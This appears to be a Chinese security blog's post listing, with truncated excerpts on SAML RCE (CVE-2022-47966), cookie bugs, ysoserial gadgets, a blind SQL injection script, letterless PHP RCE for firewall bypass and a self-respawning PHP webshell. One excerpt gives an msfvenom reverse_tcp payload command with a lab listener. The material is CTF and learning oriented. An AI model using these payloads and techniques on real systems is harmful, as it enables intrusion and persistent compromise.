前言 CVE-2022-47966 是一个基于 XSLT 转换解析特性，并且由于小于 1.4.2 版本的 Apache Santuario 在验证 SAML Response 的逻辑顺序的不合理导致的未经授权远程命令执行漏洞。而大于此版本的 Apache Santuario 在经过授权后也仍然可能造成 RCE。凡是使用旧版本的 Apache San…

1 月 15 号：https://blog.ankursundara.com/cookie-bugs/ 由于旧的 RFC 和 框架实现存在差异问题。导致 cookie 可能存在不同的解释和劫持 The empty cookie Browsers actually allow a cookie with an empty name! javascri…

如何在 ysoerial 上编写你自己的 Gadget 呢？ 简单分析一下，主入口需要接收两个参数，第一个参数是类名，第二个参数是执行命令。 类需要实现 ObjectPayload 接口中的 getObject 方法，返回一个泛型对象。这个对象就是需要被序列化的 然后这个类需要有这个注解 @Dependencies({"commons-c…

每次找脚本都花费不少时间，这里存放两个脚本供参考，需要自取修改。 布尔盲注模板： import requests import time url = 'http://aa3f5cdf-f23b-48b0-97f1-ecac497d9e13.node4.buuoj.cn:81/' flag = "" proxies = { &qu…

Powershell Step 1：使用Msfvenom生成一个攻击载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1 Step 2：在 msf 中启动监听 use ex…

无源码调试 Jar 包 普通可执行 Jar 包 这里先以普通 jar 包为例。在 pom.xml 中的文件插件内容如下： <build> <plugins> <plugin> <artifactId>maven-assembly-plugin</artifactId> <config…

Q：什么时候可能用到这篇文章的内容？ A：想要绕过防火墙执行代码的时候。 无字母 RCE 方法可以考虑： 取反 按位异或 自增 POC 上传文件 取反 php 5 无法复现，但是 php 7 可以。原因是PHP7前是不允许用($a)();这样的方法来执行动态函数的，但PHP7中增加了对此的支持 如果目标存在 <?php @eval($_REQ…

前言 需要在 CTFd 平台中加入当提交 flag 则会在群中播报并且还可以返回排行榜的功能。群聊机器人的实现依赖于 cq-http。整个部署完全使用 Docker。 框架图如下： 在此记录并分享思路。 sign-server 在部署 cqhttp 前，我们需要先搭建签名服务器，用于登录验证。新建一个目录 mkdir -p ~/docker/uni…

当你遇到一个 Web 环境，可以执行命令，但是 Web 路径没有写权限，也没有回显，目标也不出网，怎么办？思考 SQL 注入中存在延时注入，是否我们也可以做到呢？下面就以 Linux 环境来尝试分析吧。 代码如此： <?php highlight_file(__FILE__); error_reporting(0); // Everythin…

“知识在于积累” 比较常见的不死马是通过一个死循环强占一个 PHP 进程不断写入恶意的代码到 php 文件中。代码如下： <?php // 忽略用户中止并允许脚本 // 永远运行 ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); // unlink，删除自身 $file…